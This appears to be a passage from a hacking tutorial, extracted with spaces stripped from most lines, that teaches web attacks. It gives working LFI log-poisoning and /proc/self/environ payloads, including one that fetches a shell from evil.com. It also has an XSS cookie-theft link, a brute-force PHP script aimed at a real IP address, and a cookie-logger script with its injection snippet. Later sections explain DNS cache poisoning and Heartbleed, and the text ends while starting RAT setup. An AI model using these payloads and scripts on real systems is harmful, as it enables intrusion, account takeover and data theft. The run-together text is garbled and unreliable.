/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache2/access_log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/access_log
/var/log/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache2/error_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/error_log
/var/log/error.log
Thesearethemostcommonones,assaid.Butyoumightfindyourselfinalotofsituationswherethingsarenotwheretheycommonlyare.Ifyoufindyourselffailingonallofthosecommonpathsforthelogs,justgiveupandmoveontoanothermethodofattack.Mostlikely,youwon’tfindthelogpathoryoucan’treadit.
However,ifyoudomanagetoincludetheerrorandoraccesslog,youwillmostlikelycrashyourbrowserifyouareexploitingahugesite.Oryouwillseetonsandtonsandtonsofaccessoranerrorlogs.Inthiscase,readfurther(evenifyourbrowsercrashes).
Now,thewholepointwithincludingtheerrorandoraccesslog(s)aretobeabletoincludesomethingwecanmodify.Because,wecaneasilymodifytheaccessorerrorlogs!
Whatwewanttodois,“poison”thelogswithPHPcode.ThenincludethemwiththeLFIandthereforeexecutingthecode!Allyouneedtodoisgotowww.site2.com/<?phpsystem(“echoinclude($_GET[‘a’]);>/tmp/mmmmmmm”)?>andyouwillpoisontheerrorlog(becausethefile<?phpsystem(“echoinclude($_GET[‘a’]);>/tmp/mmmmmmm”)?>willmostlikelynotexistandthereforemakea404error).
Ifdonecorrectly,youwillnowexecutethefollowingcodebyincludingtheerrorlog:
<?php
system(“echoinclude($_GET[‘a’]);>/tmp/mmmmm”)
?>
Thiswillwriteafilecalled“mmmmm”to/tmp/whichyoucannowincludeinsteadofthelogfiles(justtomakethingsabitmorepractical).Iwon’tgointofurtherdetailsonhowtocompromiseasystem.Ibasicallyservedyouyoursystemsheadonaplate.YougotaworkingLFI,youpoisonedthelogfile(s)andyougotasystem()code
executionat/tmp/mmmmm
ProcSelfEnviron
The/proc/self/environmethodisalotlikelogpoisoning,justalotsimpler.Andmorecommonlyfound(nowadaysanyway).Theenvironfileissimplyafilethatwillspitoutinformationaboutthe“environment”.Thatis,informationaboutthesystem,theuserandprocessetc.Keepinmindthatthisisn’tafilereally,it’sastream.Changingdependingontheshellenvironment.Theenvironfile/streamwillprintout,amongotherthings,theuser-agent.ThisiswhatwewillusetoexecutePHPcode.
Ifyoujustincludethe/proc/self/environwithoutanytampering,youshouldseesomethinglikethis:
DOCUMENT_ROOT=/somepath/somepath/somepathGATEWAY_INTERFACE=CGI/1.1HTTP_ACCEPT=text/html,application/xml;q=0.9,application/xhtml+xml,image/png,image/jpeg,image/gif,image/x-xbitmap,*/*;q=0.1HTTP_COOKIE=something=somethingHTTP_HOST=www.site2.comHTTP_USER_AGENT=SomeuseragentPATH=/bin:/usr/binQUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2FenvironREDIRECT_STATUS=200REMOTE_ADDR=127.0.0.1REMOTE_PORT=41823REQUEST_METHOD=GETREQUEST_URI=/index.php?do=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2FenvironSCRIPT_FILENAME=/somepath/somepath/somepath/index.phpSCRIPT_NAME=/index.phpSERVER_ADDR=127.0.0.1SERVER_ADMIN=webmaster@site2.comSERVER_NAME=www.site2.comSERVER_PORT=80SERVER_PROTOCOL=HTTP/1.0SERVER_SIGNATURE=
Apache/1.3.37(Unix)mod_ssl/2.2.11OpenSSL/0.9.8iServeratwww.site2.comPort80
Youcanseethatitwilloutputalotofinfo.Liketheuser-agent,whichwewillusetotampertheoutputwith.
Now,useyourfavoriteuser-agentswitcherortamperingprogram.Icanrecommendtamperdataoranyuser-agentswitcherforFirefox.
Changeyouruser-agentto<?phpsystem(“wgethttp://evil.com/myshell.txt-o/var/path/to/www/folder/myshell.php”);?>
Andvoila!Theenvironstreamnowoutputsyouruser-agent-PHP-codebackthethePHPscript,whichhopefullyexecutes thecode.Ifyoudideverythingcorrectly,andeverything worked as planned. You should now have a shell at/var/path/to/www/folder/myshell.phpwhichhopefully iswww.site2.com/myshell.phpwiththecontentsofhttp://evil.com/myshell.txt.Ofcoursethisisallproofofconceptstuff.Soyouwouldhavetochangealotofpathsandsoon.Butthisishowyoudoit
anyway.
PHPfilter(s)
The PHP filtermethod is basically just like normalLFI. Except, you can actuallyread the PHP source code of the files you include instead of executing the code!Which means, we can read configuration files and such for PHP scripts. Whichsometimescanleadtosomesortofaccess.
Whatwewanttodoisconvertthedatawegetfromreadingthefiletosomethingthatwillnotgetexecutedwhenitgoesthoughttheinclude()function.Base64encryptionwilldothis.WithPHPfiltersyoucanconvertthedatayoureadfromafiletobase64before itgets included.Thisway,wewill getbase64output toourbrowser,which,whendecryptedwillbePHPsourcecodeifyouincludeaPHPfile.
Thisishowyoudoit:
●www.site2.com/index.php?page=php://filter/read=convert.base64-encode/resource=YOURFILE
So,ifyouwanttoreadconfig.phpyoudo:
●www.site2.com/index.php?page=php://filter/read=convert.base64-encode/resource=config.php
config.phpwillmostofthetimecontainsomeinterestinginformationifitexists.LikeMySQL logins and whatnot (depending on the script of course). You will getsomething looking like this in your browser:VGhpcyBpcyBhIGJhc2U2NCBzdHJpbmc=
Youcandecodeitwiththisonlinetool:http://coderstoolbox.net/string/
UnderstandingXSS
Introduction
CrossSiteScripting(CSSforshort,butsometimesabbreviatedasXSS)isoneofthemost common application level attacks that hackers use to sneak into webapplications today. Cross site scripting is an attack on the privacy of clients of aparticularwebsitewhichcanleadtoatotalbreachofsecuritywhencustomerdetailsare stolen or manipulated. Unlike most attacks, which involve two parties – theattacker, and the web site, or the attacker and the victim client, the XSS attackinvolvesthreeparties–theattacker,aclientandthewebsite.Thegoalof theCSSattack is to steal the client cookies, or any other sensitive information, which canidentifytheclientwiththewebsite.Withthetokenofthelegitimateuserathand,theattacker can proceed to act as the user in his/her interaction with the site –specifically, impersonate theuser.For example, in one audit conducted for a largecompany it was possible to peek at the user’s credit card number and privateinformationusingaCSSattack.ThiswasachievedbyrunningmaliciousJavascriptcodeatthevictim(client)browser,withthe“accessprivileges”ofthewebsite.ThesearetheverylimitedJavascriptprivilegeswhichgenerallydonotletthescriptaccessanything but site related information. It should be stressed that although thevulnerabilityexistsatthewebsite,atnotimeisthewebsitedirectlyharmed.Yetthisis enough for the script to collect the cookies and send them to the attacker. Theresult,theattackergainsthecookiesandimpersonatesthevictim.
XSSAttack
Let us call the site under attack:www.vulnerable.site.At the core of a traditionalCSSattackliesavulnerablescriptinthevulnerablesite.ThisscriptreadspartoftheHTTPrequest (usually theparameters,butsometimesalsoHTTPheadersorpath)andechoesitbacktotheresponsepage,infullorinpart,withoutfirstsanitizingiti.e. making sure it doesn’t contain Javascript code and/or HTML tags. Suppose,therefore,thatthisscriptisnamedwelcome.cgi,anditsparameteris“name”.Itcanbeoperatedthisway:
Andtheresponsewouldbe:
How can this be abused?Well, the attackermanages to lure the victim client intoclickinga link theattacker supplies tohim/her.This is a carefully andmaliciouslycrafted link, which causes the web browser of the victim to access the site(www.vulnerable.site) and invoke the vulnerable script. The data to the scriptconsists of a Javascript that accesses the cookies the client browser has forwww.vulnerable.site. It is allowed, since the client browser “experiences” theJavascriptcomingfromwww.vulnerable.site,andJavascript’ssecuritymodelallowsscriptsarrivingfromaparticularsitetoaccesscookiesbelongingtothatsite.
Suchalinklookslike:
●http://www.vulnerable.site/welcome.cgi?name=
Thevictim,uponclickingthelink,willgeneratearequesttowww.vulnerable.site,asfollows:
Andthevulnerablesiteresponsewouldbe:
The victim client’s browser would interpret this response as an HTML pagecontainingapieceofJavascriptcode.Thiscode,whenexecuted,isallowedtoaccessallcookiesbelongingtowww.vulnerable.site,andtherefore,itwillpopupawindowattheclientbrowsershowingallclientcookiesbelongingtowww.vulnerable.site.
Ofcourse,arealattackwouldconsistof sending thesecookies to theattacker.Forthis,theattackermayerectawebsite(www.attacker.site),anduseascripttoreceivethecookies. Insteadofpoppingupawindow, theattackerwouldwritea code thataccessesaURLathis/herownsite(www.attacker.site),invokingthecookiereceptionscriptwithaparameterbeingthestolencookies.Thisway,theattackercangetthecookiesfromthewww.attacker.siteserver.
Themaliciouslinkwouldbe:
● http://www.vulnerable.site/welcome.cgi?name=<script>window.open(“http://www.attacker.site/collec t.cgi?cookie=”%2Bdocument.cookie)</script>
Andtheresponsepagewouldlooklike:
The browser, immediately upon loading this page, would execute the embeddedJavascript and would send a request to the collect.cgi script in www.attacker.site,withthevalueofthecookiesofwww.vulnerable.sitethatthebrowseralreadyhas.
Thiscompromisesthecookiesofwww.vulnerable.sitethattheclienthas.Itallowstheattackertoimpersonatethevictim.Theprivacyoftheclientiscompletelybreached.
UnderstandingBrokenAuthenticationandSessionManagement
Authentication and session management includes all aspects of handling userauthentication and managing active sessions. This includes handling of userauthenticationmostly which is done by username and password andmanage thatsessionafterauthenticationhasbeenconfirmed.Errorinhandlingbothofthethingscan lead to the hijacking of user or administrative accounts, undermineauthorizationandaccountabilitycontrols,andcauseprivacyviolations.
Duetovulnerableauthenticationandsessionmanagementmanyattackscanbedonebyattacker.Iwillbeexplaininggiventwotypesofattacks:
●BruteForceAttack
●Sessionhijacking
BruteForceAttack
Brute force attack is a particularly sinisterway for thosewithmalicious intent togainaccesstotheserver.Thepremiseofthistypeofattackistoultimatelyhaverootaccess inorder toaccomplishwhatevergoal theattackermayhave.Todo this, theattacker typically uses software that attempts to guess password throughmultiplefailedloginattempts.Ifthereisnosecurityinplace,thesefailedloginattemptscouldcontinueindefinitelyuntilitguessescorrectly.
TofindwebsitevulnerabletoBruteForceAttackwecaneasilycheckwhetherthesiteisvulnerableornot.Itcanbecheckedmanually.Tocheckforthevulnerabilityofsitejust go to login page of that site and for particular username just try differentpasswords.Ifthesiteisnotaskingforextrainformationandsimplyallowingyoutotrymorepasswordthisresultsthatthiswebsiteisvulnerabletobruteforceattack.Ifthatwebsiteisvulnerabletobruteforceattack,thenyoucanapplygivenmethodtodobruteforceattack.
MethodtodoBruteForceattackisgivenbelow:-
SincetodoBruteForceattackIamusingPHPscript.SotorunthisscriptweneedalocalservernamedasXAMPP.SofirstinstallXAMPPlocalserverinPC.
LimitationofthisPHPScript
● Loginpageonwhichyouareattackingmustbeusingformtogetusernameandpassword.
●ThisScriptwilltryfordifferentpasswordsoyoumusthaveavalidusernameforthatwebsite.
Ifthewebsiteissatisfyinggiventwoconditions,thenyoucanattackbythismethod.Oneloginpageisgiven:
Redcircleistextfieldforusernameandbluecircleistextfieldforpassword.Thenrightclickonthispageandthenclickonviewsourceoption.Youwillgetfollowingpage.
Inthispagesearchforusernameandyouwillseefollowingpart:
Inthispagelookfor<Form>to</Form>part.
Inthisformnameofusernametextfieldisuseridandpasswordtextfieldispassword.Anditislinkedtologinvalidate.jsponclickingonsubmit.ThisinformationisusedinPHPscript.
PHPScriptforbruteforceattack
<?php
//setPOSTvariables
$filename=””;
functionCheckItOut($user,$pass)
{
//URLwithwhichthefromislinked
$url=‘http://220.227.240.189:8000/ICMS/loginvalidate.jsp’;
$s=$pass;
$fields=array(
‘userid’=>$user//useridisnameofusernamefield
‘password’=>$pass,//passwordisnameofpasswordtextfield
);
$fields_string=””;
//url-ifythedataforthePOST
foreach($fieldsas$key=>$value){$fields_string.=$key.’=’.$value.’&’;}
rtrim($fields_string,’&’);
//openconnection
$ch=curl_init();
//settheurl,numberofPOSTvars,POSTdata
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POST,count($fields));
curl_setopt($ch,CURLOPT_POSTFIELDS,$fields_string);
//executepost
$result=curl_exec($ch);
$info=curl_getinfo($ch);
//closeconnection
set_time_limit(0);
echo$info;
return$info[‘http_code’];
}
$filename=“password.txt”;//allsetofpasswordwhichyouwanttocheck
$file=fopen($filename,‘r’);
$user=”puneet”
while(!feof($file))
{
$pass=fgets($file);
$length=strlen($pass);
$length=$length-2;
$pass1=substr($pass,0,$length);
$check=CheckItOut($user,$pass1);
if($check==200)
{
echo“PasswordforthisUsername=$useris:“;
echo$pass;
break;
}
}
fclose($file);
?>
Note:Password.txtshouldbeintthesamedirectoryinwhichthisscriptwillberunning.
Results
Onrunningthisscriptifanypasswordmatchforthegivenusernameitwillshowtheresult“PasswordforthisUsername=$useris:_________“.Otherwiseitwillshowblankpage.So,aboveisthemethodtodobruteforceattackonavulnerablewebsite.
SessionHijacking
Incomputerscience,sessionhijackingistheexploitationofavalidcomputersession—sometimesalsocalledasessionkey—togainunauthorizedaccesstoinformationorservicesinacomputersystem.Inparticular,itisusedtorefertothetheftofamagiccookieusedtoauthenticateausertoaremoteserver.Ithasparticularrelevancetowebdevelopers,astheHTTPcookiesusedtomaintainasessiononmanywebsitescanbeeasilystolenbyanattackerusinganintermediarycomputerorwithaccesstothesavedcookiesonthevictim’scomputer(seeHTTPcookietheft).
Whatisacookie?
Acookieknownasawebcookieorhttpcookieisasmallpieceoftextstoredbytheuserbrowser.Acookieissentasaheaderbythewebservertothewebbrowserontheclient side.Acookie is staticand is sentbackby thebrowserunchangedeverytimeitaccessestheserver.
A cookie has an expiration time that is set by the server and are deletedautomaticallyaftertheexpirationtime.
Cookie is used to maintain user’s authentication and to implement shopping cartduringhisnavigation,possiblyacrossmultiplevisits.
Whatcanwedoafterstealingcookie?
Well,asweknowwebsitesauthenticatetheiruserswithacookie, itcanbeusedtohijackthevictim’ssession.Thevictim’sstolencookiecanbereplacedwithourcookietohijackhissession.
The following is a cookie stealing scriptwhich is tobe stored inattacker’shost. Itreceivesthecookiedataandstorestoatextfile.
<?php
{
functionGetIP()
{
if(getenv(“HTTP_CLIENT_IP”)&&strcasecmp(getenv(“HTTP_CLIENT_IP”),“unknown”))
$ip=getenv(“HTTP_CLIENT_IP”);
elseif(getenv(“HTTP_X_FORWARDED_FOR”)&&strcasecmp(getenv(“HTTP_X_FORWARDED_FOR”),“unknown”))
$ip=getenv(“HTTP_X_FORWARDED_FOR”);
elseif(getenv(“REMOTE_ADDR”)&&strcasecmp(getenv(“REMOTE_ADDR”),“unknown”))
$ip=getenv(“REMOTE_ADDR”);
elseif(isset($_SERVER[‘REMOTE_ADDR’])&&$_SERVER[‘REMOTE_ADDR’]&&strcasecmp($_SERVER[‘REMOTE_ADDR’],“unknown”))
$ip=$_SERVER[‘REMOTE_ADDR’];
else
$ip=“unknown”;
return($ip);
}
functionlogData()
{
$ipLog=“log.txt”;
$cookie=$_SERVER[‘QUERY_STRING’];
$register_globals=(bool)ini_get(‘register_gobals’);
if($register_globals)$ip=getenv(‘REMOTE_ADDR’);
else$ip=GetIP();
$rem_port=$_SERVER[‘REMOTE_PORT’];
$user_agent=$_SERVER[‘HTTP_USER_AGENT’];
$rqst_method=$_SERVER[‘METHOD’];
$rem_host=$_SERVER[‘REMOTE_HOST’];
$referer=$_SERVER[‘HTTP_REFERER’];
$date=date(“ldSofFYh:i:sA”);
$log=fopen(“$ipLog”,“a+”);
if(preg_match(“/\bhtm\b/i”,$ipLog)||preg_match(“/\bhtml\b/i”,$ipLog))
fputs($log,“IP:$ip|PORT:$rem_port|HOST:$rem_host|Agent:$user_agent|ME
THOD:$rqst_method|REF:$referer|DATE{:}$date|COOKIE:$cookie
“);
else
fputs($log,“IP:$ip|PORT:$rem_port|HOST:$rem_host|Agent:$user_agent|ME
THOD:$rqst_method|REF:$referer|DATE:$date|COOKIE:$cookie\n\n”);
fclose($log);
}
logData();
?>
Savethescriptasacookielogger.phpinyourserver.(Anyfreewebhostingsiteslike
justfree,x10hosting etc..).Also create an empty text file andname it as log.txt anduploadit.
Lookforuserinteractivesiteswhichcontaincommentsorforums.Postthefollowingcodewhichinvokesoractivatesthecookieloggeronyourhost.
<scriptlanguage=“Javascript”>document.location=“http://www.yourhost.com/cookielogger.php?cookie="+document.cookie;</script>
UnderstandingDNSCachePoisoning
TheDomainNameSystem(DNS) isanessentialpartof the Internet.TheprimarypurposeofDNSistoresolvesymbolicdomainnamestoIPaddresses.ManyInternetsecuritymechanisms, including host access control and defenses against spam andphishing, implicitlyorexplicitlydependon the integrityof theDNS infrastructure.Unfortunately,securitywasnotoneofthedesignconsiderationsforDNS,andmanyattacksonDNSwerereportedovertheyears.
CachepoisoningisarguablythemostprominentanddangerousattackonDNS.DNScachepoisoningresultsinaDNSresolverstoring(i.e.,caching)invalidormaliciousmappings between symbolic names and IP addresses. Because the process ofresolvinganamedependsonauthoritativeserverslocatedelsewhereontheInternet,DNSprotocolisintrinsicallyvulnerabletocachepoisoning.AnattackermaypoisonthecachebycompromisinganauthoritativeDNSserverorbyforgingaresponsetoarecursiveDNSquerysentbyaresolvertoanauthoritativeserver.
Manynon-cryptographicdefensesfocussolelyonblindresponseforgeryandattemptto solve the problemby increasing the entropy ofDNSquery components such astransactionIDs,querylabels,andportnumbers.Thismakesblindresponseforgerymoredifficult.Unfortunately,blindresponseforgeryisjustoneofthepossibleattackvectorsforDNScachepoisoningand,unlikecryptographicsolutions,thesedefensesarevulnerable to trivial eavesdroppingattacks.Therefore, theydonotaddress therootcausesofDNScachepoisoningandprovideonlypartialprotection.
DNSBackground
DNSisadistributedstoragesystemforResourceRecords(RR).EachDNSresolverorauthoritativeserverstoresRRsinitscacheorlocalzonefile.AResourceRecordincludesalabel,class,type,anddata.ThelabelofanRRisasymbolicdomainnameusedwhenaccessinganInternetresource.TheclassiseitherIN,orCH;theclassofmostRRsisIN,whichmeanstheInternetsystem.Thetypecanhavemanypossiblevalues,butwewillfocusonrecordsoftypeA,CNAME,andNS.AnArecordholdsamappingfromadomainnametoanIPaddress,aCNAMErecordholdsamappingfromadomainnametoanalias,andanNSrecordholdsamappingfromadomainnametothenameofanauthoritativenameserverforthatdomain.Eachrecordhasatime-to-live(TTL)parameterandispurgedfromthecacheonceitsTTLexpires.
No twoRRs in the cachemay have the same label, class, type, and data, but it ispossibletohavemultiplerecordswiththesamelabel,class,andtype.SuchagroupiscalledaResourceRecordSet(RRset).
Cachingandrecursiveresolution
WhenaDNSresolverorauthoritativeserverreceivesaquery, it searches itscachefor a matching label. If there is no matching label in the cache, the server mayinsteadretrievefromthecacheandreturnareferralresponse,containinganRRsetofNStypewhoselabelis“closer”tothedomainwhichisthesubjectofthequery.
Insteadof sendingareferralresponse, theDNSresolvermayalsobeconfigured toinitiate the samequery to an authoritativeDNS server responsible for thedomainnamewhichisthesubjectofthequery.Eachqueryisidentifiedbyarandom16-bittransaction ID (TXID). The authoritative server can respond with an answer, areferral, or a failed response. In general, a response is comprised of the query,answer, authority, and additional sections. Each section may have none, one, ormultipleRRsets.
The authoritative server’s response—or a forged message pretending to be theauthoritative server’s response—is accepted by theDNS resolver and stored in itscache only if the RRset of each section passes a set of conditions known as thebailiwickrule.TheseconditionsarenotpartoftheDNSspecificationanddependonthe implementation of the resolver. Furthermore, in certain circumstances, thereceivedrecordsmayevenoverwritethosealreadystoredinthecache.
PoisoningtheDNScachebyaddingfalserecordsisaseriousthreat,butDNSrecordscorrespondingtopopulardomainsarelikelytobealreadystoredinthecachepriortoanattackandarethusnotvulnerabletothebasicforgeryexploit(thisobservationunderliesthenaivedefenseofincreasingthetime-to-liveparameteroftheserecords).ItistheabilitytooverwriteexistingrecordsthatmakesDNSresponseforgerysuchadevastating attack. To understand record overwriting, we need to understand themechanismthroughwhichanattackermayintroduceforgedrecordsintothecacheof aDNSresolverand thebailiwickand trust-level rules that governadditionandoverwritingofrecordsinDNScaches.
Cachepoisoningwithoutresponseforgery
BeforeBINDadoptedthebailiwickrulein1993,theownerofanyDNSauthoritativeserver could compromise records corresponding to any domain name. Whenrespondingtoaqueryfromtheresolver,amaliciousauthoritativeservercansend,intheadditionalsectionofitsresponse,anarbitrarymappingfromanydomainname(includingthoseoutsideitsauthority)toanIPaddress.
For instance, consider amalicious authoritative server forbad.com.Whena clientasks itsDNSresolver toresolvewww.bad.com, theresolverqueries the server.Theserver’sresponsecontainsinitsadditionalsectionthemappingfrom,say,ns1.good.comtoamaliciousIPaddress.Withoutthebailiwickrule,thismappingwouldhavebeencachedbytheresolver,eventhoughgood.comwasneitherpartofthequery,norunderthemaliciousserver’sauthority.
Blindresponseforgeryusingbirthdayattack
The basic DNS protocol does not authenticateresponses to recursive queries. The only checksare: (1) the query section and 16-bit transactionID (TXID) of the response must match those ofthe query, and (2) the source IP address anddestination port of the response must match,respectively,thedestinationIPaddressandsourceport of thequery.The first arrivingUDPpacketwhich satisfies these conditions is treated as avalidresponsefromtheauthoritativeserver.
Prior to recent patches, many DNS resolvers used a fixed port to send queries.Therefore,withtheexceptionofarandomTXID,allvaluesusedbytheresolvertodeterminethevalidityofapacketreceivedinresponseto itsqueryarepredictable.Togenerateavalid-looking response, it is sufficient to guess theTXIDused in thequery.
AttacksonDNSexploiting the“birthdayparadox”havebeenknownsinceat least2002 [21]. If theTXIDhasonlyNbits of entropy (inpractice,N=16), anetworkattackerneedsonlyO(2N/2)trialsonaveragetogenerateaforgedresponsewhichmatches the TXID of the query and will thus be accepted as valid by the targetresolver. The answer section of the forgery contains a malicious mapping from adomainnametoanIPaddress.
For theattack to succeed, the forgerymustarrive to the targetresolverbefore theresponse fromthe legitimateauthoritative server. If the legitimateresponsearrivesfirst, itwill be cachedby the resolver anduntil it’s time-to-live (TTL) expires, theresolver will not ask the authoritative server to resolve the same domain name,preventingtheattackerfrompoisoningthemappingforthatdomain.
Kaminsky’sexploit.AtBlackHat2008,Kaminskypresentedanewextensionofthebirthdayattack.Whilethebasicmechanismisthesame(usingthebirthdayattacktoforgearesponsewiththesametransactionIDasthequery),threeobservationsmakeKaminsky’sattackmoreseriousthan“conventional”DNSforgery.
First,theattackercanforcethetargetresolvertoinitiateaquerytoanauthoritativeserverofhischoice.Second,modernattackershaveenoughnetworkbandwidthtogeneratealargenumberofspoofedresponses,eachwithadifferent guess of the transaction ID. Third, themalicious “payload” of the forged response is the additionalsection(asopposedtotheanswersectionintheconventionalattack),forreasonsexplainedbelow.
Thebasicschemeoftheexploitisasfollows.Theattackerchoosesthedomainnamethathewantstocompromise(e.g.,www.google.com).Hethenqueriesthetargetresolverwithanysubdomainwhichisnotalreadycachedontheresolver(e.g.,anon-existentsubdomainsuchasxyz12.google.com).Becausethenameisnotinthecache,thiscausesthetargetresolvertosendaquerytotheauthoritativeserver(s)forthisdomain.Atthispoint,theattackerfloods the resolver with a large number of forged responses, each containing a different guess of the query’stransactionID.Ifaforgeryattemptfails,theattackercanimmediatelystartanewrace,usingadifferentdomainname, and continue until he actually wins the race, i.e., a forgery with a valid transaction ID arrives to theresolverbeforethelegitimateanswer.
UnderstandingHeartbleed
In March 2014, researchers found a catastrophic vulnerability in OpenSSL, thecryptographic library used to secure connections in popular server productsincludingApacheandNginx.WhileOpenSSLhashadseveralnotablesecurityissuesduring its 16-yearhistory, this flaw—theHeartbleedvulnerability—wasoneof themost impactful. Heartbleed allows attackers to read sensitive memory fromvulnerable servers, potentially including cryptographic keys, login credentials, andother private data. Exacerbating its severity, the bug is simple to understand andexploit.
Using extensive active scanning, I assessed who was vulnerable, characterizingHeartbleedscopeacrosspopularHTTPSwebsitesandthefullIPv4addressspace.Ialso surveyed the rangeofprotocolsand serverproductsaffected. I estimated that24–55% of HTTPS servers in the Alexa Top 1 Million were initially vulnerable,including44oftheAlexaTop100.Twodaysafterdisclosure,Iobservedthat11%ofHTTPS sites in the Alexa Top 1 Million remained vulnerable, as did 6% of allHTTPSserversinthepublicIPv4addressspace.Ifoundthatvulnerablehostswerenotrandomlydistributed,withmorethan50%locatedinonly10ASesthatdonotreflecttheASeswiththemostHTTPShosts.InmyscansoftheIPv4addressspace,Iidentifiedover70modelsofvulnerableembeddeddevicesandsoftwarepackages.IalsoobservedthatbothSMTP+TLSandTorwereheavilyaffected;morethanhalfofallTornodeswerevulnerableinthedaysfollowingdisclosure.
In addition to patching, many sites replaced their TLS certificates due to thepossibility that the private keys could have been leaked. I analyzed certificatereplacement and found that while many of the most popular websites reactedquickly, less thanaquarterofAlexaTop1Millionsitesreplacedcertificates in theweek following disclosure. Evenmoreworryingly, only 10% of the sites thatwerevulnerable48hoursafterdisclosurereplacedtheircertificateswithinthenextmonth,andofthosethatdid,14%neglectedtochangetheprivatekey,gainingnoprotectionfromcertificatereplacement.
HeartbleedVulnerability
TheOpenSSLimplementationoftheHeartbeatExtensioncontainedavulnerabilitythatallowedeitherend-pointtoreaddatafollowingthepayloadmessageinitspeer’smemory by specifying a payload length larger than the amount of data in theHeartbeatRequestmessage.Becausethepayload lengthfield is twobytes, thepeerrespondswithupto216bytes(~64KB)ofmemory.Thebugitselfissimple:thepeertruststheattacker-specifiedlengthofanattacker-controlledmessage.
The OpenSSL patch adds a bounds check that discards the Heartbeat Requestmessageifthepayloadlengthfieldexceedsthelengthofthepayload.However,whilethebugiseasytoconceptualizeandthefixisstraight-forward,thepotentialimpactof the bug is severe: it allows an attacker to read private memory, potentiallyincludinginformationtransferredoverthesecurechannelandcryptographicsecrets.
TheImpactofHeartbleed
Heartbleed had the potential to affect any service that usedOpenSSL to facilitateTLSconnections,includingpopularweb,mail,messaging,anddatabaseservers.Totrack itsdamage,Iperformedaregularvulnerabilityscanagainst theAlexaTop1Milliondomains andagainst 1%samples of thepublic, non-reserved IPv4addressspace.Igeneratedthesesamplesusingrandomselectionwithremoval,perZMap’sexisting randomization function. I excluded hosts and networks that previouslyrequestedremovalfromourdailyHTTPSscans.
ScanningMethodology
ItestedfortheHeartbleedbugbymodifyingZMaptosendHeartbeatrequestswithnopayloadnorpadding,andthelengthfieldsettozero.PertheRFC,theserequestsshould be rejected. However, vulnerable versions of OpenSSL sent a responsecontainingonlypadding,ratherthansimplydroptherequest.ThepatchedversionofOpenSSL—as well as other popular libraries, including GnuTLS, NSS, BouncyCastle,PolarSSL,CyaSSLandMatrixSSL—correctlydiscardtherequest(ordonotsupporttheHeartbeatExtension).
I emphasize that this approach does not exploit the vulnerability or access anyprivatememory—onlyrandompaddingissentbackbytheserver.Whileitwaslaterfound thatHeartbleed scanning causedHP IntegratedLights-Out (iLO)devices tocrash,Ireceivednoreportsofmyscansdisruptingthesedevices—likelybecauseourapproachdidnotexploitthevulnerability.Wehavepubliclyreleasedourscannerathttps://zmap.io.
ImpactonPopularWebsites
Determining which websites were initially vulnerable poses significant difficulties.Little attention was paid to the Heartbeat Extension prior to the vulnerabilityannouncement,andmanypopularsitespatchedthevulnerabilitywithinhoursofthedisclosure.Codenomicon,oneof thegroups thatdiscoveredHeartbleed, speculatedthat 66% ofHTTPS sites were vulnerable. However, this number represented theApacheandNginxmarketshareandmaywellreflectanoverestimate,becausesomeoperatorsmay have disabled the extension, deployed dedicated SSL endpoints, orusedolder,non-vulnerableversionsofOpenSSL.
Top100Websites
AlloftheAlexaTop100websiteswerepatchedwithin48hoursofdisclosure—priortothestartofourscans.Todocumentthe impactonthesewebsites,weaggregatedpressreleases,other’stargetedscans,andquotesprovidedtoMashable,anewssitethat hosted one of the popular lists of sites for which users should change theirpasswordsduetopossibleexposureviaHeartbleed.
Al-Bassam completed a vulnerability scanof theAlexaTop10,000domains onApril8, 2014 at 16:00 UTC (22 hours after thevulnerability disclosure). His scan found630 vulnerable sites, 3,687 supportingHTTPS but not vulnerable, and 5,683 notsupporting HTTPS. Several prominentsites, including Yahoo, Imgur, Stack
Overflow,Flickr,Sogou,OkCupid,andDuckDuckGo,werefoundvulnerable.Table3liststhevulnerabilitystatusofthetop30HTTPS-enabledsitesintheUS.
ChapterThree:RemoteAdministrationTool
WhatisaRAT?
Aremoteadministrationtool(RAT)isapieceofsoftwarethatallowsaremote“operator”tocontrolasystemasifhehasphysicalaccesstothatsystem.Whiledesktopsharingandremoteadministrationhavemanylegaluses,“RAT”softwareisusuallyassociatedwithcriminalormaliciousactivity.
MaliciousRATsoftwareistypicallyinstalledwithoutthevictim’sknowledge, often as payload of a Trojan horse, and will try tohide its operation from the victim. Somany trojans andbackdoors now have remote administrationcapabilitiesallowinganindividualtocontrolthe
victim’scomputer.Manytimes,afile(oftencalledaclientorstub)mustbeopenedonthevictim’scomputerbeforethehackercanhaveaccesstoit.Thesearegenerallysent throughemail,P2P file sharingsoftware,and in internetdownloads.Theyareusually disguised as a legitimate programor file.Many clients/stubswill display afakeerrormessagewhenopened,tomakeitseemlikeitdidn’topen.Somewillalsodisableantivirusandfirewallsoftware.
RATtrojanscangenerallydothefollowing:
Blockmousesandkeyboards Changethedesktopwallpapers
Downloads,uploads,deletes,andrenamefile Destroyshardwarebyoverclocking
Dropvirusesandworms EditRegistry
Formatdrives Stealpasswords,creditcardnumbers
Alteryourwebbrowser’shomepage Hidedesktopicons,taskbarandfiles
Silentlyinstallapplications Logkeystrokes,keystrokecapturesoftware
OpenCD-ROMtray OverloadtheRAM/ROMdrive
Sendmessageboxes Playsounds
Controlmouseorkeyboard Andmuchmore!
Awell-designedRATwillallowtheoperatortheabilitytodoanythingthattheycoulddowithphysicalaccesstothemachine.SomeRATtrojansarepranksthataremostlikelybeingcontrolledbyafriendorenemyonApril
Fool’sDayoraholiday.PrankRATsaregenerallynotharmful,andwon’tlogkeystrokesorstoreinformationaboutthesystemonthecomputer.Theyusuallydodisruptivethingslikeflipthescreenupside-down,opentheCD-ROMtray,orswapmousebuttons.
HowtosetupRAT
DNS
Nowyouneedtodecide,ifyouwanttouseaDNSornot.IwouldrecommendaDNS,becauseit’ssaferthanwithoutone!Ifyoudon’twanttouseit,youcanskipthispart.Iwouldn’trecommendusingNo-Ip,becauseitisn’tsafeanymore.IcanrecommendFreeDNSandDuckDNS.
